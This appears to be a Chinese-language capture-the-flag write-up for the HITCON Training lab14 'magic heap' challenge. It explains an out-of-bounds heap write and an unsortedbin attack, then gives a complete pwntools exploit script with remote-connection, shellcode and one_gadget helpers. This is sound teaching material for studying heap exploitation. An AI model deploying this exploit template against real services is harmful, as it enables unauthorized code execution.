HITCON Training lab14 magic heap
程序分析
在IDA中分析,程序中只有create、edit、free三个功能,其中edit功能可以越界写
存在system("cat flag")函数,且当控制 v3 为 4869,同时控制 magic 大于 4869 时,就可以得到 flag 了
利用思路
首先free掉一块0x80的堆块到unsortedbin
之后我们通过edit功能的越界写漏洞,借助chunk_0来修改已经被free掉的chunk_1,使其bk指针指向magic-0x10的地址
最后当我们再次create申请一个0x80堆块的时候,magic的地址上便会写入main_arena+88的地址
而这便已经大于了4869。
EXP
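#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
# @偏有宸机_Exploit-Template
# Exploiting: python exploit.py [Exploit_Template]
# - python exploit.py [IP PORT] [Exploit_Template]
# Edit values:
# - RemPro()
# - elf_addr
# - libc_addr
# - enable_Onegadgets
# - exp()
import os
import sys
from pwn import *
from one_gadget import generate_one_gadget
# Terminal used by gdb.attach() in debug(); the splitw variant is the alternative.
# context.terminal = ["tmux","splitw","-h"]
context.terminal = ["tmux","new-window"]
# context.log_level = "debug"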
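### Remote / local connection
def RemPro(ip='', port=''):
    """Open the target tube and load ELF/libc into the module globals.

    Assigns the globals ``sh`` (tube), ``elf`` and ``libc``.  Selection:
      * ``python exploit.py IP PORT [func]`` -> remote(argv[1], argv[2]);
        libc is ``pro_libc`` when one is configured and loadable, else the
        local ``libc_addr``;
      * otherwise -> ``remote(ip, port)`` is attempted and a local
        ``process(elf_addr)`` is used when that fails (with the default
        empty ip/port this always means a local process).

    ``one_ggs`` is declared global for the commented-out one_gadget lines
    but is not assigned here.  Always returns 1.
    """
    global sh, elf, libc, one_ggs
    elf_addr = "./magic_heap"                      # local ELF
    libc_addr = "/lib/x86_64-linux-gnu/libc.so.6"  # local libc
    pro_libc = ""                                  # remote-side libc path, if known

    if len(sys.argv) > 2:
        sh = remote(sys.argv[1], sys.argv[2])
        libc = None
        # Only try the remote libc when one is configured; the original
        # attempted ELF("") and relied on the exception to fall back.
        if pro_libc:
            try:
                libc = ELF(pro_libc)
                libc_addr = pro_libc
            except Exception:
                libc = None
        if libc is None:
            log.info("No set Remote_libc...")
            libc = ELF(libc_addr)
    else:
        libc = ELF(libc_addr)
        try:
            sh = remote(ip, port)
            if pro_libc != "":
                libc = ELF(pro_libc)
                libc_addr = pro_libc
        except Exception:
            # Best-effort fallback to a local process; a bare `except`
            # would also swallow KeyboardInterrupt/SystemExit.
            sh = process(elf_addr)
    # one_ggs = [283258, 983908, 987655]
    # one_ggs = one_gadget(libc_addr)
    elf = ELF(elf_addr)
    return 1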
### Debug helper
def debug(cmd=""):
    """Attach gdb to the global tube ``sh`` when running locally.

    Does nothing when IP and PORT were given on the command line (remote
    run).  ``cmd`` is passed through to ``gdb.attach`` as the gdb script.
    """
    if len(sys.argv) > 2:
        return
    log.progress("Loading Debug....")
    gdb.attach(sh, cmd)
### Shell_code
def shell_code(fw):
    """Return assembled shellcode for the given word size (32 or 64).

    Any other value of ``fw`` yields ``None``.
    """
    if fw == 64:
        return asm(shellcraft.amd64.linux.sh())
    if fw == 32:
        return asm(shellcraft.sh())
    return None
### One_Gadget
def one_gadget(libc_addr):
    """Return the one_gadget offsets of the libc at ``libc_addr`` as ints."""
    log.progress("Leak One_Gadgets...")
    return [int(offset) for offset in generate_one_gadget(libc_addr)]
#one_gg = one_gadget("/lib/x86_64-linux-gnu/libc.so.6")
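def exp():
    """Run the lab14 magic-heap sequence over the global tube ``sh``.

    The nested helpers wrap the program's menu entries (create/edit/free);
    the prompt strings are the program's own.  Returns ``sh`` so the caller
    can go interactive.
    """
    def add(size, content):
        sh.sendlineafter("choice :", "1")
        sh.sendlineafter("Heap : ", str(size))
        sh.sendlineafter("heap:", content)

    def edit(idx, size, content):
        sh.sendlineafter("choice :", "2")
        sh.sendlineafter("Index :", str(idx))
        sh.sendlineafter("Heap : ", str(size))
        sh.sendlineafter("heap : ", content)

    def dele(idx):
        sh.sendlineafter("choice :", "3")
        sh.sendlineafter("Index :", str(idx))

    add(0x20, "a" * 8)   # chunk 0
    add(0x80, "b" * 8)   # chunk 1, freed below
    add(0x20, "c" * 8)   # chunk 2
    # add(0x80,"d"*8)
    dele(1)

    magic_addr = 0x6020c0  # address of the global `magic` (hard-coded for this binary)
    # Write past chunk 0's 0x20 bytes of data into chunk 1's header:
    # prev_size, size (0x91), fd, bk = magic-0x10.  The size argument is
    # the data length plus the 0x20 bytes that overflow.
    payload = "a" * 0x20 + p64(0x0) + p64(0x91) + p64(0x123) + p64(magic_addr - 0x10)
    edit(0, 0x20 + 0x20, payload)
    debug()
    add(0x80, p64(9999))
    sh.recvuntil("choice :")
    sh.sendline("4869")
    # sh.sendlineafter("choice :","4869")
    # debug()
    return sh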
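if __name__ == "__main__":
    RemPro()
    # An optional trailing argument names a module-level function to run
    # instead of exp(): `exploit.py FUNC` or `exploit.py IP PORT FUNC`.
    # The name is looked up in globals() rather than eval()'d, so a
    # command-line argument cannot inject arbitrary expressions.
    if len(sys.argv) > 3:
        globals()[sys.argv[3]]()
    elif len(sys.argv) == 2:
        globals()[sys.argv[1]]()
    else:
        exp()
    sh.interactive()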
一眨眼居然2个月没有更新了,生产队的驴都不敢这样歇….惨惨 :-(